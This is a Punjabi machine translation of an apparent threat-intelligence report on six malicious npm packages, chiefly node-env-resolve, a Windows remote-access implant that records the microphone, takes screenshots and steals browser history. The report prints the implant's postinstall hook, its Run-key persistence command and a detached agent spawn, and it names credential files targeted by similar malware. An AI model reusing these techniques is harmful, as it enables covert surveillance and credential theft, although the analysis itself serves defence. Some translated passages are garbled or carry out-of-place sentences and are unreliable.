TL; ਡਾ
1 ਅਪ੍ਰੈਲ ਅਤੇ 3 ਮਈ, 2026 ਦੇ ਵਿਚਕਾਰ, ਇੱਕ ਸਿੰਗਲ ਐਨਪੀਐਮ ਪ੍ਰਕਾਸ਼ਕ, user0001, ਗੈਰ-ਤਸਦੀਕਸ਼ੁਦਾ Gmail ਪਤੇ ਨਾਲ ਰਜਿਸਟਰ ਕੀਤਾ ਗਿਆ tanvisoul9@gmail.com, ਜਾਣਬੁੱਝ ਕੇ ਬੇਢੰਗੇ, ਬੁਨਿਆਦੀ ਢਾਂਚੇ ਵਰਗੇ ਨਾਵਾਂ ਵਾਲੇ ਛੇ ਪੈਕੇਜਾਂ ਨੂੰ ਚੁੱਪ-ਚਾਪ ਅੱਗੇ ਵਧਾਇਆ: centralogger, dom-utils-lite, node-fetch-lite, connector-agent, node-gyp-runtimeਹੈ, ਅਤੇ node-env-resolve.
ਦੇ ਨਵੀਨਤਮ ਦੋ ਸੰਸਕਰਣ node-env-resolve, 1.0.7 ਅਤੇ 1.0.8, ਨੂੰ 2 ਮਈ ਨੂੰ Xygeni ਦੇ ਮਾਲਵੇਅਰ ਅਰਲੀ ਵਾਰਨਿੰਗ (MEW) ਸਿਸਟਮ ਦੁਆਰਾ ਫਲੈਗ ਕੀਤਾ ਗਿਆ ਸੀ ਅਤੇ 3 ਮਈ ਨੂੰ ਖਤਰਨਾਕ ਹੋਣ ਦੀ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ ਸੀ।
ਇਹ ਇਮਪਲਾਂਟ ਉਸ ਲਈ ਅਸਾਧਾਰਨ ਹੈ ਜੋ ਇਹ ਨਹੀਂ ਹੈ: ਇੱਥੇ ਕੋਈ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਨਹੀਂ ਹਨ, ਕੋਈ OAST ਕਾਲਬੈਕ ਨਹੀਂ ਹਨ, ਨਹੀਂ ਅਲੋਚਨਾ, ਅਤੇ ਇੰਸਟਾਲੇਸ਼ਨ ਸਮੇਂ AWS ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨੂੰ ਹਾਸਲ ਕਰਨ ਦੀ ਕੋਈ ਕੋਸ਼ਿਸ਼ ਨਹੀਂ। ਇਸ ਦੀ ਬਜਾਏ, postinstall.js ਇੱਕ HKCU ਰਨ ਕੁੰਜੀ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ, ਇੱਕ ਵਿੰਡੋਜ਼ ਬੂਟ-ਪਰਸਿਸਟੈਂਸ ਐਂਟਰੀ ਲਗਾਉਂਦਾ ਹੈ ਜੋ ਲਾਂਚ ਹੁੰਦੀ ਹੈ wscript.exe ਇੱਕ VBS ਸਟੱਬ ਦੇ ਵਿਰੁੱਧ। ਫਿਰ ਇਹ ਇੱਕ ਵੱਖਰਾ Node.js ਏਜੰਟ ਪੈਦਾ ਕਰਦਾ ਹੈ ਜੋ ਮਾਈਕ੍ਰੋਫੋਨ ਕੈਪਚਰ, ਬ੍ਰਾਊਜ਼ਰ-ਇਤਿਹਾਸ ਚੋਰੀ, ਸਕ੍ਰੀਨਸ਼ਾਟਿੰਗ, ਅਤੇ ਮਾਊਸ/ਕੀਬੋਰਡ ਸਿਮੂਲੇਸ਼ਨ ਲਈ ਮੋਡੀਊਲਾਂ ਨੂੰ ਬੰਡਲ ਕਰਦਾ ਹੈ।
ਅਸੀਂ ਇਸ ਕਲੱਸਟਰ ਨੂੰ ਬੁਲਾ ਰਹੇ ਹਾਂ ਦੇਵਟੈਪ, ਕਿੱਟ ਤੋਂ ਬਾਅਦ ਇਹ ਡਿਵੈਲਪਰ ਦੀ ਮਸ਼ੀਨ 'ਤੇ ਚੱਲਦਾ ਰਹਿੰਦਾ ਹੈ।
ਲਿਖਣ ਦੇ ਸਮੇਂ ਸਾਰੇ ਛੇ ਪੈਕੇਜ npm 'ਤੇ ਲਾਈਵ ਸਨ। ਅਸੀਂ ਉਨ੍ਹਾਂ ਨੂੰ ਰਜਿਸਟਰੀ ਦੇ ਦੁਰਵਰਤੋਂ ਚੈਨਲ 'ਤੇ ਜਮ੍ਹਾਂ ਕਰ ਦਿੱਤਾ ਹੈ। ਡਿਫੈਂਡਰਾਂ ਨੂੰ ਪ੍ਰਕਾਸ਼ਕ ਤੋਂ ਹਟਾਉਣ ਤੱਕ ਕਿਸੇ ਵੀ ਇੰਸਟਾਲ ਨੂੰ ਹਟਾਉਣਾ ਚਾਹੀਦਾ ਹੈ।
ਕਲੱਸਟਰ: ਛੇ ਪੈਕੇਜ, ਇੱਕ ਪ੍ਰਕਾਸ਼ਕ
ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ user0001 ਅਪ੍ਰਮਾਣਿਤ ਹੈ। ਇਸਦਾ ਕੋਈ ਨਹੀਂ ਹੈ SCM ਤਸਦੀਕ, ਕੋਈ ਡੋਮੇਨ-ਬਾਊਂਡ ਈਮੇਲ ਨਹੀਂ, ਅਤੇ ਕੋਈ ਪੁਰਾਣਾ ਇਤਿਹਾਸ ਨਹੀਂ। ਜੀਮੇਲ ਹੈਂਡਲ tanvisoul9 ਕਿਸੇ ਹੋਰ npm ਪ੍ਰਕਾਸ਼ਕ ਰਿਕਾਰਡ ਵਿੱਚ ਨਹੀਂ ਦਿਖਾਈ ਦਿੰਦਾ ਜੋ ਅਸੀਂ ਲੱਭ ਸਕਦੇ ਹਾਂ।
ਸਾਰੇ ਛੇ ਪੈਕੇਜ ਇੱਕੋ ਮੇਨਟੇਨਰ ਦੀ ਸੂਚੀ ਵਿੱਚ ਹਨ, ਇੱਕੋ ਖਾਤੇ ਤੋਂ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤੇ ਗਏ ਸਨ, ਅਤੇ ਇੱਕੋ ਜਿਹੇ ਸ਼ੇਅਰ ਕਰਦੇ ਹਨ package.json ਬਾਇਲਰਪਲੇਟ। ਕੋਈ ਨਹੀਂ ਹੈ repository, ਨਹੀਂ homepage, ਅਤੇ ਕੋਈ ਨਹੀਂ description ਇੱਕ ਲਾਈਨ ਤੋਂ ਲੰਬਾ।
ਨਾਮਕਰਨ ਰਣਨੀਤੀ ਦਿਲਚਸਪ ਹਿੱਸਾ ਹੈ। ਇੱਕ ਕਲਾਸਿਕ ਨਿਰਭਰਤਾ-ਉਲਝਣ ਜਾਂ ਟਾਈਪੋਸਕੈਪਟ ਮੁਹਿੰਮ ਦੇ ਉਲਟ, ਇਹਨਾਂ ਵਿੱਚੋਂ ਕੋਈ ਵੀ ਨਾਮ ਕਿਸੇ ਖਾਸ ਅੱਪਸਟ੍ਰੀਮ ਲਾਇਬ੍ਰੇਰੀ ਨੂੰ ਨਿਸ਼ਾਨਾ ਨਹੀਂ ਬਣਾਉਂਦਾ। ਇਸਦੀ ਬਜਾਏ, ਉਹਨਾਂ ਨੂੰ ਇੱਕ ਅਸਲੀ ਵਿੱਚ ਅਲੋਪ ਹੋਣ ਲਈ ਕੈਲੀਬਰੇਟ ਕੀਤਾ ਜਾਂਦਾ ਹੈ package.json or npm ls ਆਉਟਪੁੱਟ.
| ਪੈਕੇਜ | ਪਹਿਲੀ ਪ੍ਰਕਾਸ਼ਿਤ | ਨਵਾਂ ਵਰਜਨ | ਵਰਜਨ | ਕਲੱਸਟਰ ਵਿੱਚ ਭੂਮਿਕਾ |
|---|---|---|---|---|
| ਸੈਂਟਰੋਗਰ | 2026-04-01 12:46 UTC | 1.0.9 | 5, 1.0.5 ਤੋਂ 1.0.9 ਤੱਕ | ਕਲੱਸਟਰ ਦਾ "ਲੌਗਿੰਗ ਯੂਟਿਲਿਟੀ" ਕਵਰ; ਸਭ ਤੋਂ ਪਹਿਲਾਂ ਪ੍ਰਕਾਸ਼ਿਤ |
| ਡੋਮ-ਯੂਟਿਲਸ-ਲਾਈਟ | 2026-04-14 07:36 UTC | 1.0.3 | 3 | ਆਮ DOM-ਸਹਾਇਕ ਕਵਰ |
| ਨੋਡ-ਫੈਚ-ਲਾਈਟ | 2026-04-19 10:22 UTC | 1.0.2 | 3 | ਮਿਮਿਕਸ ਨੋਡ-ਫੈਚ ਪਰਿਵਾਰ |
| ਕਨੈਕਟਰ-ਏਜੰਟ | 2026-04-25 05:12 UTC | 1.0.0 | 1 | ਆਮ-ਨਾਮ "ਏਜੰਟ" |
| ਨੋਡ-ਜਿਪ-ਰਨਟਾਈਮ | 2026-04-25 05:17 UTC | 1.0.0 | 1 | ਮਿਮਿਕਸ ਨੇਟਿਵ-ਮੋਡਿਊਲ ਬਿਲਡ ਟੂਲਿੰਗ |
| ਨੋਡ-ਐਨਵੀ-ਰੈਜ਼ੋਲਵ | 2026-04-25 05:21 UTC | 1.0.9 | 10, 1.0.0 ਤੋਂ 1.0.9 ਤੱਕ | ਕਿਰਿਆਸ਼ੀਲ ਡਰਾਪਰ; ਪੂਰਾ ਇਮਪਲਾਂਟ |
ਨਾਮ ਜਿਵੇਂ centralogger, node-fetch-liteਹੈ, ਅਤੇ node-gyp-runtime ਕੋਡ ਸਮੀਖਿਆ ਵਿੱਚ ਵਿਵਾਦਪੂਰਨ ਦਿਖਣ ਲਈ ਤਿਆਰ ਕੀਤੇ ਗਏ ਹਨ। ਇਹ ਉਹਨਾਂ ਚੀਜ਼ਾਂ ਵਾਂਗ ਲੱਗਦੇ ਹਨ ਜੋ ਪਹਿਲਾਂ ਹੀ ਕਿਸੇ ਪ੍ਰੋਜੈਕਟ ਦੇ ਨਿਰਭਰਤਾ ਰੁੱਖ ਵਿੱਚ ਹੋਣਗੀਆਂ।
ਇੱਕ ਤਾਜ਼ੇ, ਗੈਰ-ਪ੍ਰਮਾਣਿਤ ਪ੍ਰਕਾਸ਼ਕ ਅਤੇ ਗੁੰਮ ਰਿਪੋਜ਼ਟਰੀ ਲਿੰਕਾਂ ਦੇ ਨਾਲ, ਉਹ ਇੱਕ ਪਛਾਣਨਯੋਗ ਪੈਟਰਨ ਬਣਾਉਂਦੇ ਹਨ: ਇੱਕ ਅਦਾਕਾਰ ਰਜਿਸਟਰੀ ਵਿੱਚ ਘੱਟ-ਘ੍ਰਿਸ਼ਣ ਵਾਲੇ ਨਾਮਾਂ ਨੂੰ ਸੀਡ ਕਰਦਾ ਹੈ, ਫਿਰ ਉਸ 'ਤੇ ਤੇਜ਼ੀ ਨਾਲ ਦੁਹਰਾਉਂਦਾ ਹੈ ਜੋ ਮਹੱਤਵਪੂਰਨ ਹੈ। ਇਸ ਮਾਮਲੇ ਵਿੱਚ, node-env-resolve ਅੱਠ ਦਿਨਾਂ ਵਿੱਚ ਦਸ ਸੰਸਕਰਣ ਪ੍ਰਾਪਤ ਹੋਏ।
ਵਿੰਡੋਜ਼ ਡਿਵੈਲਪਮੈਂਟ ਬਾਕਸ 'ਤੇ ਕੀ ਆਉਂਦਾ ਹੈ
ਖਤਰਨਾਕ ਚੇਨ ਚਾਲੂ ਹੈ node-env-resolve:1.0.8 ਇੱਕ npm RAT ਲਈ ਛੋਟਾ, ਸਿੱਧਾ, ਅਤੇ ਅਸਧਾਰਨ ਤੌਰ 'ਤੇ ਵਿਸ਼ੇਸ਼ਤਾ ਨਾਲ ਭਰਪੂਰ ਹੈ।
ਪੋਸਟਇੰਸਟਾਲ: ਸਥਿਰਤਾ ਅਤੇ ਵੱਖਰਾ ਏਜੰਟ
package.json ਇੱਕ ਸਿੰਗਲ ਇੰਸਟਾਲ ਹੁੱਕ ਘੋਸ਼ਿਤ ਕਰਦਾ ਹੈ:
{ "scripts": { "postinstall": "node postinstall.js" } }postinstall.js ਤਿੰਨ ਕੰਮ ਕ੍ਰਮ ਵਿੱਚ ਕਰਦਾ ਹੈ।
ਪਹਿਲਾਂ, ਇਹ npm ਟ੍ਰੀ ਦੇ ਬਾਹਰ ਇੱਕ ਇੰਸਟਾਲੇਸ਼ਨ ਡਾਇਰੈਕਟਰੀ ਨੂੰ ਸਟੇਜ ਕਰਦਾ ਹੈ। ਸਕ੍ਰਿਪਟ ਵਿੱਚ ਰਨਟਾਈਮ 'ਤੇ ਮਾਰਗ ਦੀ ਗਣਨਾ ਇਸ ਤਰ੍ਹਾਂ ਕੀਤੀ ਜਾਂਦੀ ਹੈ INSTALL_DIR. ਫਿਰ ਇਹ ਇੱਕ ਅੰਦਰੂਨੀ ਚਲਾਉਂਦਾ ਹੈ execSync('npm install --production --silent ...') ਇਮਪਲਾਂਟ ਦੀ ਰਨਟਾਈਮ ਨਿਰਭਰਤਾ ਨੂੰ ਖਿੱਚਣ ਲਈ ਇਸਦੇ ਅੰਦਰ। ਇਹ ਏਜੰਟ ਨੂੰ ਡਿਸਕ 'ਤੇ ਕਿਤੇ ਇੱਕ ਮੈਨੂਅਲ ਰੱਖਦਾ ਹੈ node_modules ਆਡਿਟ ਨਹੀਂ ਮਿਲੇਗਾ।
ਦੂਜਾ, ਇਹ ਇੱਕ VBS ਲਾਂਚਰ ਲਿਖਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ ਬੂਟ ਸਥਿਰਤਾ ਲਈ ਰਜਿਸਟਰ ਕਰਦਾ ਹੈ:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run \ /v ${AGENT_NAME} \ /t REG_SZ \ /d "wscript.exe \"${vbsPath}\"" /fwscript.exe ਵਿੰਡੋਜ਼ ਸਕ੍ਰਿਪਟ ਹੋਸਟ ਹੈ, ਇੱਕ ਦਸਤਖਤ ਕੀਤਾ ਮਾਈਕ੍ਰੋਸਾਫਟ ਬਾਈਨਰੀ ਜੋ ਚੱਲਦਾ ਹੈ .vbs ਕੰਸੋਲ ਵਿੰਡੋ ਤੋਂ ਬਿਨਾਂ ਫਾਈਲਾਂ। ਇਹ ਪਹਿਲਾਂ ਤੋਂ ਹੈcisਇਸੇ ਕਰਕੇ ਇਸਨੂੰ ਆਟੋਰਨ ਸਟੱਬਾਂ ਲਈ ਪਸੰਦ ਕੀਤਾ ਜਾਂਦਾ ਹੈ।
ਇੱਕ ਮੇਲ ਵੀ ਹੈ reg delete ਅੰਦਰ ਦਾ ਰਸਤਾ src/index.js, ਸੁਝਾਅ ਦਿੰਦਾ ਹੈ ਕਿ ਇਮਪਲਾਂਟ ਨੂੰ ਆਪਰੇਟਰ ਦੇ ਹੁਕਮ 'ਤੇ ਸਾਫ਼-ਸੁਥਰੇ ਢੰਗ ਨਾਲ ਹਟਾਉਣਯੋਗ ਬਣਾਉਣ ਲਈ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਹੈ।
ਤੀਜਾ, ਇਹ ਇੱਕ ਵੱਖਰਾ ਚਾਈਲਡ ਪ੍ਰਕਿਰਿਆ ਪੈਦਾ ਕਰਦਾ ਹੈ:
spawn(node, [path.join(INSTALL_DIR, 'src/index.js')], { detached: true, env: { ...process.env, SERVER_URL } })ਇੱਥੇ ਦੋ ਵੇਰਵੇ ਮਾਇਨੇ ਰੱਖਦੇ ਹਨ।
SERVER_URL ਵਾਤਾਵਰਣ ਤੋਂ ਪੜ੍ਹਿਆ ਜਾਂਦਾ ਹੈ। ਨਤੀਜੇ ਵਜੋਂ, C2 ਐਂਡਪੁਆਇੰਟ ਪ੍ਰਤੀ ਡਿਪਲਾਇਮੈਂਟ ਕੌਂਫਿਗਰ ਕਰਨ ਯੋਗ ਹੈ ਅਤੇ ਪੈਕੇਜ ਵਿੱਚ ਬੇਕ ਨਹੀਂ ਕੀਤਾ ਜਾਂਦਾ ਹੈ। ਉਹ ਛੋਟੀ ਪਰ ਜਾਣਬੁੱਝ ਕੇ ਕੀਤੀ ਗਈ ਚੋਣ ਜ਼ਿਆਦਾਤਰ ਸਟੈਟਿਕ-IOC ਸਵੀਪਸ ਨੂੰ ਹਰਾ ਦਿੰਦੀ ਹੈ।
ਇਸ ਤੋਂ ਇਲਾਵਾ, ਪੈਦਾ ਹੋਇਆ ਬੱਚਾ ਪੂਰੇ ਮਾਪਿਆਂ ਦੇ ਵਾਤਾਵਰਣ ਨੂੰ ਵਿਰਾਸਤ ਵਿੱਚ ਪ੍ਰਾਪਤ ਕਰਦਾ ਹੈ। ਇਸ ਲਈ, ਕੋਈ ਵੀ NPM_TOKEN, AWS_*, GITHUB_TOKEN, ਜਾਂ ਇੰਸਟਾਲ ਸਮੇਂ ਡਿਵੈਲਪਰ ਸ਼ੈੱਲ ਵਿੱਚ ਮੌਜੂਦ SSH-ਏਜੰਟ ਸਾਕਟ ਲੰਬੇ ਸਮੇਂ ਤੱਕ ਚੱਲਣ ਵਾਲੇ ਏਜੰਟ ਦੀ ਮੈਮੋਰੀ ਵਿੱਚ ਯਾਤਰਾ ਕਰਦਾ ਹੈ।
ਏਜੰਟ ਕੀ ਭੇਜਦਾ ਹੈ
ਬੰਡਲ ਕੀਤਾ ਹੋਇਆ src/ ਟ੍ਰੀ ਵਿੱਚ ਤਿੰਨ ਮਾਡਿਊਲ ਸ਼ਾਮਲ ਹਨ ਜਿਨ੍ਹਾਂ ਦੇ ਨਾਮ ਹੀ ਕਹਾਣੀ ਦੱਸਦੇ ਹਨ: audioCapture.js, browserHistory.jsਹੈ, ਅਤੇ systemInfo.js.
ਰਨਟਾਈਮ ਨਿਰਭਰਤਾ ਸੂਚੀ, ਸਟੇਜਡ ਦੌਰਾਨ ਹੱਲ ਕੀਤੀ ਗਈ npm install, ਉਹਨਾਂ ਦੀ ਪੁਸ਼ਟੀ ਕਰਦਾ ਹੈ।
ਇਹ ਪਹੁੰਚ ਇੱਕ ਹਫੜਾ-ਦਫੜੀ ਵਾਲੀ ਘਟਨਾ ਨੂੰ ਇੱਕ ਨਿਯੰਤਰਿਤ ਪ੍ਰਤੀਕਿਰਿਆ ਵਿੱਚ ਬਦਲ ਦਿੰਦੀ ਹੈ।
ਅੰਨ੍ਹੇਵਾਹ ਪ੍ਰਤੀਕਿਰਿਆ ਕਰਨ ਦੀ ਬਜਾਏ, ਟੀਮਾਂ ਇਸ ਨਾਲ ਕੰਮ ਕਰਦੀਆਂ ਹਨ ਸਪੱਸ਼ਟ ਤਰਜੀਹ ਅਤੇ ਤੇਜ਼ ਉਪਚਾਰ.
| ਨਿਰਭਰਤਾ | ਇਸ ਸੰਦਰਭ ਵਿੱਚ ਇਹ ਕਿਸ ਲਈ ਹੈ |
|---|---|
| ਸਕ੍ਰੀਨਸ਼ਾਟ-ਡੈਸਕਟਾਪ | ਸਮੇਂ-ਸਮੇਂ 'ਤੇ ਸਕ੍ਰੀਨ ਕੈਪਚਰ |
| @ਨਟ-ਟ੍ਰੀ-ਫੋਰਕ/ਨਟ-ਜੇਐਸ | ਮਾਊਸ ਅਤੇ ਕੀਬੋਰਡ ਆਟੋਮੇਸ਼ਨ / ਇਨਪੁਟ ਸਿਮੂਲੇਸ਼ਨ |
| ਬਿਹਤਰ-sqlite3 | ਕਰੋਮ, ਐਜ, ਅਤੇ ਫਾਇਰਫਾਕਸ ਹਿਸਟਰੀ SQLite ਡੇਟਾਬੇਸਾਂ ਦਾ ਸਿੱਧਾ ਪਾਠ |
| ਐਡਮ-ਜ਼ਿਪ | ਬੰਡਲਿੰਗ ਨੇ ਬਾਹਰ ਕੱਢਣ ਤੋਂ ਪਹਿਲਾਂ ਕਲਾਕ੍ਰਿਤੀਆਂ ਇਕੱਠੀਆਂ ਕੀਤੀਆਂ। |
| ਤਿੱਖਾ | ਸਕ੍ਰੀਨਸ਼ਾਟ ਅਤੇ ਚਿੱਤਰ ਕਲਾਕ੍ਰਿਤੀਆਂ ਦਾ ਆਕਾਰ ਬਦਲਣਾ / ਸੰਕੁਚਿਤ ਕਰਨਾ |
| ਸਾਕਟ.ਆਈਓ-ਕਲਾਇੰਟ | ਸਥਾਈ ਦੋ-ਦਿਸ਼ਾਵੀ C2 ਚੈਨਲ |
| ਨੋਡ-ਮਸ਼ੀਨ-ਆਈਡੀ | ਪੀੜਤ ਟਰੈਕਿੰਗ ਲਈ ਸਥਿਰ ਪ੍ਰਤੀ-ਹੋਸਟ ਫਿੰਗਰਪ੍ਰਿੰਟ |
systemInfo.js ਕਾਲਾਂ os.networkInterfaces() ਪਹਿਲੇ ਬੀਕਨ ਤੋਂ ਪਹਿਲਾਂ ਵਾਧੂ ਫਿੰਗਰਪ੍ਰਿੰਟਿੰਗ ਲਈ।
ਆਡੀਓ ਕੈਪਚਰ ਇੱਕ ਸ਼ਾਨਦਾਰ ਸਿਗਨਲ ਕਿਉਂ ਹੈ?
MEW ਵਿੱਚ ਅਸੀਂ ਟ੍ਰਾਈਜ ਕਰਦੇ ਹਾਂ, ਜ਼ਿਆਦਾਤਰ npm RATs ਇੰਸਟਾਲ-ਟਾਈਮ ਗੁਪਤ ਚੋਰੀ 'ਤੇ ਰੁਕਦੇ ਹਨ। ਉਹ ਪੜ੍ਹਦੇ ਹਨ ~/.npmrc, ਪੜ੍ਹੋ ~/.aws/credentials, ਖੁਰਚਣਾ process.env, ਇੱਕ ਵੈੱਬਹੁੱਕ ਤੇ ਪੋਸਟ ਕਰੋ, ਅਤੇ ਬਾਹਰ ਨਿਕਲੋ। ਇਹ ਇੱਕ ਸਮੈਸ਼-ਐਂਡ-ਗ੍ਰੈਬ ਆਰਥਿਕ ਮਾਡਲ ਦੇ ਅਨੁਕੂਲ ਹੈ। ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦੀ ਅੱਧੀ-ਜੀਵਨ ਛੋਟੀ ਹੁੰਦੀ ਹੈ, ਅਤੇ ਹਮਲਾਵਰ ਨੂੰ ਜਲਦੀ ਮੁਦਰੀਕਰਨ ਕਰਨ ਦੀ ਲੋੜ ਹੁੰਦੀ ਹੈ।
node-env-resolve ਰੂਪ ਵਿੱਚ ਵੱਖਰਾ ਹੈ।
ਸਥਿਰਤਾ ਰੀਬੂਟ ਤੋਂ ਬਚਣ ਲਈ ਸੈੱਟ ਕੀਤੀ ਗਈ ਹੈ। ਏਜੰਟ ਵੱਖਰਾ ਅਤੇ ਲੰਬੇ ਸਮੇਂ ਤੱਕ ਚੱਲਦਾ ਹੈ wscript.exe. ਇਸ ਵਿੱਚ ਜੋ ਕਿੱਟ ਹੈ ਉਹ ਡਿਵੈਲਪਰ ਦੀ ਮਸ਼ੀਨ 'ਤੇ ਮੌਜੂਦ ਰਹਿਣ ਲਈ ਹੈ, ਨਾ ਕਿ ਫੜਨ ਅਤੇ ਛੱਡਣ ਲਈ: ਇੱਕ ਮਾਈਕ੍ਰੋਫੋਨ ਰਿਕਾਰਡਰ, ਇੱਕ ਕੀਬੋਰਡ/ਮਾਊਸ ਡਰਾਈਵਰ, ਪੂਰਾ ਬ੍ਰਾਊਜ਼ਰ-ਇਤਿਹਾਸ ਇੰਜੈਸਟ, ਸਕ੍ਰੀਨ ਕੈਪਚਰ, ਅਤੇ ਇੱਕ ਇੰਟਰਐਕਟਿਵ Socket.IO ਚੈਨਲ ਇੱਕ ਕੌਂਫਿਗਰੇਬਲ C2 'ਤੇ ਵਾਪਸ।
ਖਾਸ ਤੌਰ 'ਤੇ ਮਾਈਕ੍ਰੋਫ਼ੋਨ ਕੈਪਚਰ ਉਹ ਰੇਖਾ ਹੈ ਜੋ ਇਹ ਮੁਹਿੰਮ ਪਾਰ ਕਰਦੀ ਹੈ ਜਿਸਨੂੰ ਜ਼ਿਆਦਾਤਰ npm ਮਾਲਵੇਅਰ ਨਹੀਂ ਪਾਰ ਕਰਦੇ।
ਇੱਕ ਡਿਵੈਲਪਰ ਵਰਕਸਟੇਸ਼ਨ, ਵਧਦੀ ਹੋਈ, ਉਹ ਵਰਕਸਟੇਸ਼ਨ ਵੀ ਹੈ ਜਿੱਥੇ ਡਿਵੈਲਪਰ ਸਟੈਂਡ-ਅੱਪ, ਗਾਹਕ ਕਾਲਾਂ, ਡਿਜ਼ਾਈਨ ਚਰਚਾਵਾਂ ਅਤੇ ਕਾਲ 'ਤੇ ਬ੍ਰਿਜ ਲੈਂਦੇ ਹਨ। ਇੱਕ ਇਮਪਲਾਂਟ ਜੋ ਮਾਈਕ੍ਰੋਫੋਨ ਨੂੰ ਰਿਕਾਰਡ ਕਰਦਾ ਹੈ ਅਸਲ ਵਿੱਚ ਡਿਵੈਲਪਰ ਦੇ npm ਟੋਕਨ ਦੇ ਬਾਅਦ ਨਹੀਂ ਹੁੰਦਾ। ਇਹ ਡਿਵੈਲਪਰ ਲੈਪਟਾਪ ਦੇ ਸਾਹਮਣੇ ਕੀ ਕਹਿੰਦਾ ਹੈ ਦੇ ਬਾਅਦ ਹੁੰਦਾ ਹੈ।
ਉਹ ਸਮਰੱਥਾ ਸੈੱਟ, ਨਾਲ ਹੀ ਗੁੰਝਲਦਾਰਤਾ ਦੀ ਘਾਟ ਅਤੇ ਕਿਸੇ ਵੀ ਚਮਕਦਾਰ ਇੰਸਟਾਲ-ਟਾਈਮ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਦੀ ਅਣਹੋਂਦ, ਮੌਕਾਪ੍ਰਸਤ ਪ੍ਰਮਾਣ ਪੱਤਰ ਚੋਰੀ ਦੀ ਬਜਾਏ ਨਿਸ਼ਾਨਾ ਪਹੁੰਚ ਲਈ ਪੂਰਵ-ਸਥਿਤੀ ਵਜੋਂ ਪੜ੍ਹੀ ਜਾਂਦੀ ਹੈ।
ਅਸੀਂ ਸਿਰਫ਼ ਇਸ ਤੋਂ ਹੀ ਵਿਸ਼ੇਸ਼ਤਾ ਦਾ ਦਾਅਵਾ ਨਹੀਂ ਕਰ ਰਹੇ ਹਾਂ। ਅਸੀਂ ਕਾਰਜਸ਼ੀਲ ਪ੍ਰੋਫਾਈਲ ਨੂੰ ਨੋਟ ਕਰ ਰਹੇ ਹਾਂ।

ਅੱਠ-ਦਿਨਾਂ ਦੀ ਦੁਹਰਾਓ ਕੈਡੈਂਸ 'ਤੇ node-env-resolve ਸਮਾਂਰੇਖਾ ਵਿੱਚ ਸਭ ਤੋਂ ਵੱਧ ਕਾਰਜਸ਼ੀਲ ਤੌਰ 'ਤੇ ਦੱਸਣ ਵਾਲਾ ਵੇਰਵਾ ਹੈ।
ਇਹ ਅੱਗ-ਭੁੱਲਣ ਵਾਲੀ ਡ੍ਰੌਪ ਨਹੀਂ ਹੈ। ਪ੍ਰਕਾਸ਼ਕ ਸਰਗਰਮੀ ਨਾਲ ਡ੍ਰੌਪਰ ਨੂੰ ਸੰਭਾਲ ਰਿਹਾ ਹੈ, ਜਿਸਦਾ ਆਮ ਤੌਰ 'ਤੇ ਦੋ ਚੀਜ਼ਾਂ ਵਿੱਚੋਂ ਇੱਕ ਮਤਲਬ ਹੁੰਦਾ ਹੈ। ਜਾਂ ਤਾਂ ਉਹ ਇਸਨੂੰ ਵਿਆਪਕ ਤੈਨਾਤੀ ਤੋਂ ਪਹਿਲਾਂ ਟੈਸਟ ਵਾਤਾਵਰਣਾਂ ਦੇ ਵਿਰੁੱਧ ਟਿਊਨ ਕਰ ਰਹੇ ਹਨ, ਜਾਂ ਉਹਨਾਂ ਕੋਲ ਪਹਿਲਾਂ ਹੀ ਇੰਸਟਾਲ ਟੈਲੀਮੈਟਰੀ ਵਾਪਸ ਆ ਰਹੀ ਹੈ ਅਤੇ ਇਸਦਾ ਜਵਾਬ ਦੇ ਰਹੇ ਹਨ।
ਬਾਕੀ ਪੰਜ ਪੈਕੇਜਾਂ ਵਿੱਚ ਉਹਨਾਂ ਦੇ ਸ਼ੁਰੂਆਤੀ ਪ੍ਰਕਾਸ਼ਨ ਤੋਂ ਬਾਅਦ ਕੋਈ ਬਦਲਾਅ ਨਹੀਂ ਆਇਆ। ਇਹ ਸਹਾਇਕ ਕਲੱਸਟਰ ਲਈ "ਇੱਕ ਵਾਰ ਪੜਾਅ 'ਤੇ, ਨਾਮ ਛੱਡੋ" ਪੈਟਰਨ ਦੇ ਅਨੁਕੂਲ ਹੈ ਜਦੋਂ ਕਿ ਇੰਜੀਨੀਅਰਿੰਗ ਕੋਸ਼ਿਸ਼ ਉਸ ਪੈਕੇਜ 'ਤੇ ਕੇਂਦ੍ਰਿਤ ਹੈ ਜੋ ਕੰਮ ਕਰਦਾ ਹੈ।
ਵਿਸ਼ੇਸ਼ਤਾ: ਛੋਟੇ ਸੁਰਾਗ, ਕੋਈ ਪੱਕਾ ਫੈਸਲਾ ਨਹੀਂ
ਪਬਲਿਕ OSINT ਸਿਗਨਲ ਪਤਲੇ ਹਨ, ਅਤੇ ਅਸੀਂ ਉਹਨਾਂ ਨੂੰ ਨਹੀਂ ਖਿੱਚਾਂਗੇ। ਕੀ ਦੇਖਣਯੋਗ ਹੈ:
ਜੀਮੇਲ ਹੈਂਡਲ tanvisoul9 ਅੰਸ਼ਕ ਤੌਰ 'ਤੇ ਇੱਕ ਦੱਖਣੀ ਏਸ਼ੀਆਈ ਦਿੱਤੇ ਗਏ ਨਾਮ, "ਤਨਵੀ" ਨਾਲ ਮਿਲਦਾ ਜੁਲਦਾ ਹੈ। ਇਹ ਇੱਕ ਕਮਜ਼ੋਰ ਸੰਕੇਤ ਹੈ। ਜੀਮੇਲ ਹੈਂਡਲ ਪਛਾਣ ਨਹੀਂ ਹਨ, ਅਤੇ ਪਿਛਲਾ soul9 ਆਮ ਹੈ। ਸਿਰਫ਼ ਸਥਾਨਕ ਈਮੇਲ ਤੋਂ ਭੂਗੋਲ ਦਾ ਅਨੁਮਾਨ ਲਗਾਉਣਾ ਸੁਰੱਖਿਅਤ ਨਹੀਂ ਹੈ।
